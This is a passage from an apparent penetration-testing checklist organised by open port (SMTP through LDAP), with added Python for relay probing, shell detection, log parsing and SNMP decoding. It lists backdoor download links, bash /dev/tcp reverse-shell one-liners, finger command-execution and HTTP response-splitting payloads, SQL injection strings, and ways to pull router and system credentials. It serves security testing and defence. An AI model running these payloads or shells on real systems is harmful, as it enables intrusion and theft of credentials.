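    """Drives the SMTP dialogue over anything with sendline()/readline(): a socket wrapper or a fake."""
    def __init__(self, conn):
        self.conn = conn

    def cmd(self, line):
        """Send one command and return the numeric reply code, consuming multi-line replies."""
        self.conn.sendline(line)
        while True:
            reply = self.conn.readline()
            if reply[3:4] != "-":                     # "250-..." continues, "250 ..." ends the reply
                return int(reply[:3])

    def probe_relay(self, cases):
        """Return {case name: True if RCPT TO was accepted}; no DATA is sent, so nothing is delivered."""
        results = {}
        self.conn.readline()                          # 220 banner
        self.cmd("HELO tester.invalid")
        for name, mail_from, rcpt_to in cases:
            self.cmd("RSET")
            results[name] = (self.cmd(f"MAIL FROM:{mail_from}") < 300
                             and self.cmd(f"RCPT TO:{rcpt_to}") < 300)
        self.cmd("QUIT")
        return results


class SocketLine:
    """Line-oriented TCP wrapper for a real target (network access; not exercised offline)."""
    def __init__(self, host, port=25, timeout=10.0):
        self.sock = socket.create_connection((host, port), timeout)
        self.f = self.sock.makefile("rw", encoding="ascii", errors="replace", newline="")

    def sendline(self, line):
        self.f.write(line + "\r\n")
        self.f.flush()

    def readline(self):
        return self.f.readline().rstrip("\r\n")


class FakeMta:
    """Constructed MTA: accepts recipients in its own domain and relays only if open_relay is set."""
    def __init__(self, local_domain, open_relay=False):
        self.local_domain, self.open_relay = local_domain.lower(), open_relay
        self.replies = ["220 mx.example.com ESMTP ready"]

    def readline(self):
        return self.replies.pop(0)

    def sendline(self, line):
        verb = line.split(":")[0].split(" ")[0].upper()
        if verb == "RCPT":
            # Only a plain user@domain recipient counts as local; address literals, quoted
            # local parts, source routes and bang paths never match and are refused.
            m = re.search(r"@([A-Za-z0-9.\-]+)>$", line)
            local = bool(m) and m.group(1).lower() == self.local_domain
            self.replies.append("250 2.1.5 OK" if local or self.open_relay
                                else "554 5.7.1 Relay access denied")
        elif verb == "QUIT":
            self.replies.append("221 2.0.0 Bye")
        else:
            self.replies.append("250 2.0.0 OK")


if __name__ == "__main__":
    cases = relay_test_cases("target.example", "192.0.2.10", "recipient.example")
    for name, accepted in SmtpSession(FakeMta("target.example")).probe_relay(cases).items():
        print(f"{name:32} {'ACCEPTED' if accepted else 'refused'}")
```

Note that the "identical to/from" case is accepted even by the closed MTA: it is an ordinary local delivery, so on its own it proves nothing about relaying. Only an accepted recipient in a foreign domain does.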
+ full-3
Examine Configuration Files
#
sendmail.cf
#
submit.cf
o
DNS port 53 open
+ full-1
Fingerprint server/ service
#
host
*
host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]
-v verbose output
-t type: specify the record type to query, e.g. A, NS, MX, SOA or PTR
-a same as -t ANY, with verbose output
-l list the zone, i.e. attempt a zone transfer (AXFR) from the named server, if allowed
-C check the SOA record on every authoritative name server for the zone (serial mismatches reveal stale or hidden servers)
-T use TCP instead of UDP
#

nslookup
*
nslookup [ -option ... ] [ host-to-find | - [ server ]]
#
dig
*
dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
#
whois
-h Use the named host to resolve the query
-a Use ARIN to resolve the query
-r Use RIPE to resolve the query
-p Use APNIC to resolve the query
-Q Perform a quick lookup
+ full-2
DNS Enumeration

#
Bile Suite User Link
*
perl BiLE.pl [website] [project_name]
*
perl BiLE-weigh.pl [website] [input file]
*
perl vet-IPrange.pl [input file] [true domain file] [output file]
*
perl vet-mx.pl [input file] [true domain file] [output file]
*
perl exp-tld.pl [input file] [output file]
*
perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
*
perl qtrace.pl [ip_address_file] [output_file]
*
perl jarf-rev [subnetblock] [nameserver]
#
txdns User Link
*
txdns -rt -t domain_name
*
txdns -x 50 -bb domain_name
*
txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt
+ full-3
Examine Configuration Files
#
host.conf
#
resolv.conf
#
named.conf
o
TFTP port 69 open
+ full-1
TFTP Enumeration
#
tftp ip_address PUT local_file (tests whether the server accepts unauthenticated uploads)
#
tftp ip_address GET conf.txt (or other files; TFTP has no authentication and no directory listing, so file names must be guessed or taken from elsewhere, e.g. Cisco configs)
#
Solarwinds TFTP server
#
tftp -i ip_address GET /etc/passwd (old Solaris; -i is the Windows client's binary-transfer flag)
+ full-2
TFTP Bruteforcing
#
TFTP bruteforcer User Link
#
Cisco-Torch User Link
o
Finger Port 79 open
+ full-1
User enumeration
#
finger ‘a b c d e f g h’ @example.com
#
finger admin@example.com
#
finger user@example.com
#
finger 0@example.com
#
finger .@example.com
#
finger **@example.com
#
finger test@example.com
#
finger @example.com
+ full-2
Command execution
#
finger “|/bin/id@example.com”
#
finger “|/bin/ls -a /@example.com”
+ full-3
Finger Bounce
#
finger user@host@victim
#
finger @internal@external
o
Web Ports 80, 8080 etc. open
+ full-1
Fingerprint server
#
telnet ip_address port (then type the HTTP requests listed under Banner Grabbing)
#
Firefox plugins
*
All
o
firecat User Link
*
Specific
o
add n edit cookies User Link
o
asnumber User Link
o
header spy User Link
o
live http headers User Link
o
shazou User Link
o
web developer User Link
+ full-2
Crawl website
#
lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
#
httprint User Link
#
Metagoofil User Link
*
metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
+ full-3
Web Directory enumeration
#
Nikto User Link
*
nikto [-h target] [options]
#
DirBuster User Link
#
Wikto User Link
#
Goolag Scanner User Link
+ full-4
Vulnerability Assessment
#
Manual Tests
*
Default Passwords User Link
*
Install Backdoors
o
ASP
+

http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt

o
Assorted
+

http://michaeldaw.org/projects/web-backdoor-compilation/

+

http://open-labs.org/hacker_webkit02.tar.gz

o
Perl
+

http://home.arcor.de/mschierlm/test/pmsh.pl

+

http://pentestmonkey.net/tools/perl-reverse-shell/

+

http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz

o
PHP
+

http://php.spb.ru/remview/

+

http://pentestmonkey.net/tools/php-reverse-shell/

+

http://pentestmonkey.net/tools/php-findsock-shell/

o
Python
+

http://matahari.sourceforge.net/

o
TCL
+

http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes

o
Bash Connect Back Shell
+
GnuCitizen User Link
#
Attack box: nc -l -p Port -vvv
#
Victim: $ exec 5<>/dev/tcp/IP_Address/Port   (bash opens a TCP connection on file descriptor 5)
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done   (run each line received and send stdout/stderr back)
+
Neohapsis User Link
#
Attack box: nc -l -p Port -vvv
#
Victim: $ exec 0<>/dev/tcp/IP_Address/Port   # open the socket as stdin (fd 0)
Victim: $ exec 1>&0   # then point stdout at the socket
Victim: $ exec 2>&0   # and finally stderr
Victim: $ exec /bin/sh 0<&0 1>&0 2>&0   # hand all three descriptors to a shell
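As an added example (not part of the original page), the following Python shows the defensive side of the connect-back shells above: signatures for the bash /dev/tcp and descriptor-redirection tricks, netcat -e/-c, the mkfifo/nc pipe and interpreter-based socket shells, run over a constructed feed of process command lines of the kind auditd EXECVE records or an EDR export would provide. The plain nc -z port scan from earlier in the framework is deliberately left unflagged.

```python
import re

# Patterns characteristic of the connect-back one-liners above and their common relatives.
SIGNATURES = [
    ("bash /dev/tcp redirect",   re.compile(r"/dev/(tcp|udp)/[\w.\-]+/\d+")),
    ("netcat with -e/-c",        re.compile(r"\b(nc|ncat|netcat)\b.*\s-(e|c)\s+\S*sh\b")),
    ("fd redirection to socket", re.compile(r"exec\s+\d+<>")),
    ("shell over pipe to nc",    re.compile(r"(mkfifo|mknod).*\|\s*(nc|ncat)\b|\b(nc|ncat)\b.*\|\s*/bin/(ba)?sh")),
    ("interpreter socket shell", re.compile(r"\b(python\d?|perl|php|ruby)\b.*(socket|IO::Socket|fsockopen|TCPSocket).*(/bin/(ba)?sh|exec)")),
]


def classify(command_line):
    """Return the names of every signature the command line matches, in SIGNATURES order."""
    return [name for name, rx in SIGNATURES if rx.search(command_line)]


def scan_events(events):
    """events: iterable of (timestamp, user, command_line); yields one alert per matching event."""
    for ts, user, cmd in events:
        hits = classify(cmd)
        if hits:
            yield {"time": ts, "user": user, "command": cmd, "matched": hits}


# Constructed sample of process-creation events (the shape auditd EXECVE or an EDR feed would give).
SAMPLE_EVENTS = [
    ("2024-01-01T10:00:01Z", "www-data", "sh -c exec 5<>/dev/tcp/203.0.113.7/4444; cat <&5 | while read line; do $line 2>&5 >&5; done"),
    ("2024-01-01T10:00:02Z", "www-data", "bash -c exec 0<>/dev/tcp/203.0.113.7/4444; exec 1>&0; exec 2>&0; exec /bin/sh 0<&0 1>&0 2>&0"),
    ("2024-01-01T10:00:03Z", "alice",    "nc -e /bin/sh 203.0.113.7 4444"),
    ("2024-01-01T10:00:04Z", "bob",      "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 203.0.113.7 4444 > /tmp/f"),
    ("2024-01-01T10:00:05Z", "alice",    "nc -v -w 2 -z 192.0.2.1 1-1024"),
    ("2024-01-01T10:00:06Z", "root",     "python3 -c import socket,subprocess,os;s=socket.socket();s.connect((\"203.0.113.7\",4444));os.dup2(s.fileno(),0);subprocess.call([\"/bin/sh\",\"-i\"])"),
    ("2024-01-01T10:00:07Z", "backup",   "tar czf /backup/www.tgz /var/www"),
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert["time"], alert["user"], alert["matched"])
```

The bash variants are the hardest to catch at the network layer because no binary other than the shell is involved; that is why the signatures key on the /dev/tcp path and the exec N<> redirection rather than on a process name.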
*
Method Testing
o
nc IP_Address Port (then type one of the following requests, followed by a blank line)
+
HEAD / HTTP/1.0
+
OPTIONS / HTTP/1.0
+
PROPFIND / HTTP/1.0
+
TRACE / HTTP/1.1
+
PUT http://Target_URL/FILE_NAME
+
POST http://Target_URL/FILE_NAME HTTP/1.x
*
Upload Files
o
curl
+
curl -u username:password -T file_to_upload http://target/path/
+
curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" http://target/path/ (spoof the User-Agent where the server treats browsers differently from scripts)
o
put.pl User Link
+
put.pl -h target -r /remote_file_name -f local_file_name
o
webdav
+
cadaver User Link
*
View Page Source
o
Hidden Values
o
Developer Remarks
o
Extraneous Code
o
Passwords!
*
Input Validation Checks User Link

o
NULL or null
+
Possible error messages returned.
o
' , " , ; , +
+
Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
o
- , = , + , "
+
Used to craft SQL Injection queries.
o
' , & , ! , | , < , >
+
Used to find command execution vulnerabilities (shell metacharacters).
o
<script>alert(1)</script> , <img src=x onerror=alert(1)>
+
Basic Cross-Site Scripting Checks.
o
%0d%0a
+
Carriage Return (%0d) Line Feed (%0a)
#
HTTP Splitting
*

language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0aInsert undesireable content here
o
i.e. once decoded, the server's own response is cut short with Content-Length: 0 and a second, attacker-written response follows: HTTP/1.1 200 OK, Content-Type: text/html, Content-Length: 47 and a 47-byte body. A proxy or cache reading responses back-to-back pairs that second response with the next request on the connection.
#
Cache Poisoning
*

language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0aInsert undesireable content here
o
%7f , %ff
+
byte-length overflows; maximum 7- and 8-bit values.
o
-1, other
+
Integer and underflow vulnerabilities.
o
%n , %x , %s
+
Testing for format string vulnerabilities.
o
../
+
Directory Traversal Vulnerabilities.
o
% , _, *
+
Wildcard characters can sometimes present DoS issues or information disclosure.
o
Ax1024+
+
Overflow vulnerabilities.
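As an added example (not from the framework), the Python below decodes the %0d%0a splitting payload above and feeds it to a deliberately unsafe redirect handler that copies the parameter into a Set-Cookie header, then carves the resulting byte stream the way a naive proxy or cache would, exposing the second, attacker-controlled response. The hardened version rejects control characters before they reach a header, which is the fix. The handler and responses are constructed; no real web framework is involved.

```python
from urllib.parse import unquote

# The framework's splitting payload as it arrives in the query string (language=foobar%0d%0a...).
SPLIT_PAYLOAD = ("foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a"
                 "Content-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a"
                 "Insert undesireable content here")


def vulnerable_set_language(language):
    """Constructed, deliberately unsafe handler: the decoded parameter lands in a header verbatim."""
    return ("HTTP/1.1 302 Found\r\n"
            "Location: /index.html\r\n"
            f"Set-Cookie: lang={language}\r\n"
            "\r\n")


def hardened_set_language(language):
    """Same handler with the fix: refuse CR, LF and any other control character in a header value."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in language):
        raise ValueError("control characters are not allowed in a header value")
    return ("HTTP/1.1 302 Found\r\n"
            "Location: /index.html\r\n"
            f"Set-Cookie: lang={language}\r\n"
            "\r\n")


def split_responses(raw):
    """Carve a byte stream the way a naive proxy or cache would: a new response at every status line."""
    responses = []
    for chunk in raw.split("HTTP/1.1 ")[1:]:
        head, _, body = chunk.partition("\r\n\r\n")
        status_line, *header_lines = head.split("\r\n")
        headers = dict(h.split(": ", 1) for h in header_lines if ": " in h)
        responses.append({"status": status_line.split(" ")[0], "headers": headers, "body": body})
    return responses


if __name__ == "__main__":
    for r in split_responses(vulnerable_set_language(unquote(SPLIT_PAYLOAD))):
        print(r["status"], r["headers"], repr(r["body"]))
```

The cache-poisoning variant above works the same way: the injected second response carries Last-Modified and a 304, so a cache stores the attacker's body under whatever URL the next request names.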
*
Automated table and column iteration
o
orderby.py User Link
+
./orderby.py www.site.com/index.php?id=
o
d3sqlfuzz.py User Link
+
./d3sqlfuzz.py

www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--

#
Generic Vulnerability Scanners
*
Acunetix User Link
*
NStealth User Link
*
Obiwan III User Link

*
w3af User Link

#
Specific Applications/ Server Tools
*
Domino
o
dominoaudit User Link
+
dominoaudit.pl [options] -h
*
Joomla
o
cms_few User Link
+
./cms.py
o
joomsq User Link
+
./joomsq.py
o
joomlascan User Link
+

./joomlascan.py [options i.e. -p/-proxy : Add proxy support -404 : Don't show 404 responses]
o
jscan User Link
+
jscan.pl -f hostname
+
(shell.txt required)
*
aspaudit.pl User Link
o
asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
*
Vbulletin
o
vbscan.py User Link
+
vbscan.py
-v
+
vbscan.py -update
*
ZyXel
o
zyxel-bf.sh User Link
o
snmpwalk
+
snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
o
snmpget
+
snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
+ full-5
Proxy Testing
#
Burpsuite User Link
#
Crowbar User Link
#
Interceptor User Link
#
Paros User Link
#
Requester Raw User Link
#
Suru User Link
#
WebScarab User Link
+ full-6
Examine configuration files
#
Generic
*
Examine httpd.conf/ windows config files
#
JBoss User Link
*
JMX Console http://ip_address:8080/jmx-console/ (unauthenticated by default on older JBoss releases)
o
War File User Link
#
Joomla
*
configuration.php
*
diagnostics.php
*
joomla.inc.php
*
config.inc.php
#
Mambo
*
configuration.php
*
config.inc.php
#
Wordpress
*
setup-config.php
*
wp-config.php
#
ZyXel User Link
*
/WAN.html (contains PPPoE ISP password)
*
/WLAN_General.html and /WLAN.html (contains WEP key)
*
/rpDyDNS.html (contains DDNS credentials)
*
/Firewall_DefPolicy.html (Firewall)
*
/CF_Keyword.html (Content Filter)
*
/RemMagWWW.html (Remote MGMT)
*
/rpSysAdmin.html (System)
*
/LAN_IP.html (LAN)
*
/NAT_General.html (NAT)
*
/ViewLog.html (Logs)
*
/rpFWUpload.html (Tools)
*
/DiagGeneral.html (Diagnostic)
*
/RemMagSNMP.html (SNMP Passwords)
*
/LAN_ClientList.html (Current DHCP Leases)
*
Config Backups
o

/RestoreCfg.html
o
/BackupCfg.html
o
Note – the above config files are not human readable; the following tool is required to extract any admin credentials and other important settings from them
+
ZyXEL Config Reader User Link
+ full-7
Examine web server logs
#
C:\WINNT\system32\LogFiles\W3SVC1 (IIS W3C extended logs; the #Fields: header line gives the column order)
*
awk -F " " '{print $3,$11}' filename | sort | uniq -c (which columns $3 and $11 are depends on the fields the server is configured to log, so read the #Fields: line first)
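As an added example (not from the framework), the Python below parses IIS W3C extended logs by the names in the #Fields: directive rather than by column number, which is what the awk one-liner above relies on and what varies between servers. It then counts client/status pairs and flags the entries an assessor looks for: WebDAV and PUT methods, traversal and double-encoding in the URI, and clients generating repeated 404s. The log lines are a constructed sample.

```python
from collections import Counter

# Constructed sample in IIS W3C extended format; the #Fields line defines the columns.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2024-01-01 10:00:00
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2024-01-01 10:00:01 203.0.113.7 - 192.0.2.10 80 GET /index.html - 200 Mozilla/5.0
2024-01-01 10:00:02 203.0.113.7 - 192.0.2.10 80 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 404 Mozilla/5.0
2024-01-01 10:00:03 203.0.113.7 - 192.0.2.10 80 GET /_vti_bin/shtml.exe - 404 Mozilla/5.0
2024-01-01 10:00:04 198.51.100.4 - 192.0.2.10 80 GET /index.html - 200 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2024-01-01 10:00:05 203.0.113.7 - 192.0.2.10 80 PROPFIND / - 207 cadaver/0.23.3
2024-01-01 10:00:06 203.0.113.7 - 192.0.2.10 80 PUT /shell.asp - 201 cadaver/0.23.3
"""

WRITE_METHODS = {"PUT", "DELETE", "PROPFIND", "PROPPATCH", "MOVE", "COPY", "MKCOL"}


def parse_w3c(text):
    """Yield one dict per entry, keyed by the names in the most recent #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue                                  # other directives and blank lines
        elif fields:
            yield dict(zip(fields, line.split(" ")))  # values never contain spaces (encoded as +)


def client_status_counts(entries):
    """The awk '{print $3,$11} | sort | uniq' idea, but by field name: Counter of (client, status)."""
    return Counter((e["c-ip"], e["sc-status"]) for e in entries)


def suspicious(entries, not_found_threshold=2):
    """Entries worth a second look; returns (time, client, reason, method, uri) tuples."""
    hits, not_found = [], Counter()
    for e in entries:
        uri = e["cs-uri-stem"].lower()
        if e["cs-method"] in WRITE_METHODS:
            hits.append((e["time"], e["c-ip"], "write/WebDAV method", e["cs-method"], uri))
        if ".." in uri or "%2e" in uri or "%25" in uri:
            hits.append((e["time"], e["c-ip"], "traversal/encoding", e["cs-method"], uri))
        if e["sc-status"] == "404":
            not_found[e["c-ip"]] += 1
    for ip, n in not_found.items():
        if n >= not_found_threshold:
            hits.append(("-", ip, f"{n} x 404 (scanner?)", "-", "-"))
    return hits


if __name__ == "__main__":
    entries = list(parse_w3c(SAMPLE_LOG))
    for (ip, status), n in sorted(client_status_counts(entries).items()):
        print(n, ip, status)
    for hit in suspicious(entries):
        print(hit)
```

Because the parser keys on the directive, the same code works for IIS 5, 6 and 7 logs with different field selections, and for any other W3C-format source (ISA/TMG, older Exchange) without editing column numbers.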
+
References
#
White Papers
*
Cross Site Request Forgery: An Introduction to a Common Web Application Weakness User Link
*
Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity User Link
*
Blind Security Testing – An Evolutionary Approach User Link
*
Command Injection in XML Signatures and Encryption User Link
*
Input Validation Cheat Sheet User Link
*
SQL Injection Cheat Sheet User Link
#
Books
*
Hacking Exposed Web 2.0 User Link
*
Hacking Exposed Web Applications User Link
*
The Web Application Hacker’s Handbook User Link
+
Exploit Frameworks

#
Brute-force Tools
*
Acunetix User Link
#
Metasploit User Link
#
w3af User Link
o
Portmapper port 111 open
+
rpcdump.py User Link
#
rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
+
rpcinfo
#
rpcinfo [options] IP_Address
o
NTP Port 123 open
+ full-1
NTP Enumeration
# full-1
ntpdc -c monlist IP_ADDRESS
# full-2
ntpdc -c sysinfo IP_ADDRESS
# full-3
ntpq
*
host
*
hostname
*
ntpversion
*
readlist
*
version
+ full-2
Examine configuration files
#
ntp.conf
o
NetBIOS Ports 135-139,445 open
+ full-1
NetBIOS enumeration
#
Enum User Link
*
enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
#
Null Session
*
net use \\192.168.1.1\ipc$ "" /u:""
o
net view \\ip_address
o
Dumpsec User Link
#
Smbclient
*
smbclient -L //server -N (list shares over a null session)
*
smbclient -L //server -U username%password
#
Superscan User Link
*
Enumeration tab.
#
user2sid/sid2user User Link
#
Winfo User Link
+ full-2
NetBIOS brute force
#
Hydra User Link
#
Brutus User Link
#
Cain & Abel User Link
#
getacct User Link
#
NAT (NetBIOS Auditing Tool) User Link
+ full-3
Examine Configuration Files

#
Smb.conf
#
lmhosts
o
SNMP port 161 open
+ full-1
Default Community Strings
#
public
#
private
#
cisco
*
cable-docsis
*
ILMI
+ full-2
MIB enumeration
#
Windows NT
*
.1.3.6.1.2.1.1.5 Hostnames
*
.1.3.6.1.4.1.77.1.4.2 Domain Name
*
.1.3.6.1.4.1.77.1.2.25 Usernames
*
.1.3.6.1.4.1.77.1.2.3.1.1 Running Services
*
.1.3.6.1.4.1.77.1.2.27 Share Information
#
Solarwinds MIB walk User Link
#
Getif User Link
#
snmpwalk
*
snmpwalk -v 1 -c community_string IP_Address (or -v2c; add a starting OID to walk one subtree)
#
Snscan User Link
#
Applications
*
ZyXel
o
snmpget -v2c -c community_string IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
o
snmpwalk -v2c -c community_string IP_Address 1.3.6.1.4.1.890.1.2.1.2
+ full-3
SNMP Bruteforce
#
onesixtyone
*
onesixtyone -c SNMP.wordlist IP_Address
#
cat
*
./cat -h IP_Address -w SNMP.wordlist (Cisco Auditing Tool)
#
Solarwinds SNMP Brute Force User Link
#
ADMsnmp User Link
+ full-4
Examine SNMP Configuration files
#
snmp.conf
#
snmpd.conf
#
snmp-config.xml
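As an added example (not from the framework), the Python below encodes an SNMPv1 GetRequest and decodes the GetResponse with a minimal BER codec. It shows why the community-string attacks above work: the community string is the only authentication in v1/v2c and travels in the clear in every datagram, so `parse_message` recovers it from any captured packet. The sysName and ZyXEL OIDs come from the page; the agent responses are constructed, and `snmp_get` is the only function that uses the network.

```python
import socket

# Minimal BER codec for SNMPv1 (RFC 1157). v1 and v2c have no authentication beyond the community
# string, which is sent in the clear in every message; that is why a community wordlist works.


def ber_len(n):
    """BER length: one byte below 128, otherwise 0x80|count followed by the big-endian length."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, payload):
    return bytes([tag]) + ber_len(len(payload)) + payload


def ber_int(v):
    """INTEGER: two's complement, with a leading zero byte when the top bit would otherwise be set."""
    return tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))


def ber_oid(oid):
    """OBJECT IDENTIFIER: first two arcs packed into one byte, the rest base-128 with continuation bits."""
    arcs = [int(a) for a in oid.strip(".").split(".")]
    out = bytes([40 * arcs[0] + arcs[1]])
    for a in arcs[2:]:
        chunk = bytes([a & 0x7F])
        a >>= 7
        while a:
            chunk = bytes([0x80 | (a & 0x7F)]) + chunk
            a >>= 7
        out += chunk
    return tlv(0x06, out)


def build_get_request(community, oid, request_id=1):
    varbind = tlv(0x30, ber_oid(oid) + tlv(0x05, b""))            # value is NULL in a request
    pdu = tlv(0xA0, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, varbind))
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode()) + pdu)   # version 0 = SNMPv1


def build_get_response(community, request_id, oid, value_tlv):
    """Constructed agent reply (GetResponse, tag 0xA2) used for offline testing."""
    varbind = tlv(0x30, ber_oid(oid) + value_tlv)
    pdu = tlv(0xA2, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, varbind))
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode()) + pdu)


def read_tlv(buf, off):
    """Return (tag, payload, offset after the element)."""
    tag, length, off = buf[off], buf[off + 1], off + 2
    if length & 0x80:
        n = length & 0x7F
        length, off = int.from_bytes(buf[off:off + n], "big"), off + n
    return tag, buf[off:off + length], off + length


def decode_oid(body):
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


def decode_value(tag, body):
    if tag in (0x02, 0x41, 0x42, 0x43):                # INTEGER, Counter32, Gauge32, TimeTicks
        return int.from_bytes(body, "big", signed=(tag == 0x02))
    if tag == 0x04:                                    # OCTET STRING (sysName, sysDescr, ZyXEL passwords)
        return body.decode(errors="replace")
    if tag == 0x06:
        return decode_oid(body)
    if tag == 0x40:                                    # IpAddress
        return socket.inet_ntoa(body)
    return body.hex()                                  # NULL, noSuchObject and anything else


def parse_message(pkt):
    """(community, request_id, error_status, [(oid, value)]) from any SNMPv1 request or response."""
    _, msg, _ = read_tlv(pkt, 0)
    _, _version, off = read_tlv(msg, 0)
    _, community, off = read_tlv(msg, off)
    _pdu_tag, pdu, _ = read_tlv(msg, off)
    _, rid, off = read_tlv(pdu, 0)
    _, err, off = read_tlv(pdu, off)
    _, _idx, off = read_tlv(pdu, off)
    _, varbinds, _ = read_tlv(pdu, off)
    binds, off = [], 0
    while off < len(varbinds):
        _, vb, off = read_tlv(varbinds, off)
        _, oid_body, o = read_tlv(vb, 0)
        vtag, vbody, _ = read_tlv(vb, o)
        binds.append((decode_oid(oid_body), decode_value(vtag, vbody)))
    return (community.decode(), int.from_bytes(rid, "big", signed=True),
            int.from_bytes(err, "big", signed=True), binds)


def snmp_get(host, community, oid, timeout=2.0):
    """Send the request to UDP/161 and parse the reply (network access; not used by the offline test)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_get_request(community, oid), (host, 161))
        return parse_message(s.recv(4096))


if __name__ == "__main__":
    SYSNAME = "1.3.6.1.2.1.1.5.0"
    reply = build_get_response("public", 1, SYSNAME, tlv(0x04, b"core-rtr-01"))   # constructed
    print(build_get_request("public", SYSNAME).hex())
    print(parse_message(reply))
```

A brute-forcer such as onesixtyone does nothing more than call `build_get_request` once per wordlist entry and treat any GetResponse as a hit; an agent that answers for "public" or "private" has effectively no access control, and on the ZyXEL OID above the value returned is the device's admin credential.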
o
LDAP Port 389 Open
+ full-1
ldap enumeration
#
ldapminer User Link
*
ldapminer -h ip_address -p port (not required if default) -d
#
luma User Link
*
Gui based tool
#
ldp User Link
*
Gui based tool
#
openldap User Link
*
ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
*
ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
*
ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
*
ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
*
ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
+ full-2
ldap brute force
#
bf_ldap User Link
*
bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
#
K0ldS User Link
#
LDAP_Brute.pl User Link
+ full-3
Examine Configuration Files
#
General
*
containers.ldif
*
ldap.cfg
*
ldap.conf
*
ldap.xml
*
ldap-config.xml
*
ldap-realm.xml
*
slapd.conf
#
IBM SecureWay V3 server
*
V3.sas.oc
#
Microsoft Active Directory server
*
msadClassesAttrs.ldif
#
Netscape Directory Server 4
*
nsslapd.sas_at.conf
*
nsslapd.sas_oc.conf
#
OpenLDAP directory server
*
slapd.sas_at.conf
*
slapd.sas_oc.conf
#
Sun ONE Directory Server 5.1
*
75sas.ldif
o
rlogin port 513 open
+
Rlogin Enumeration
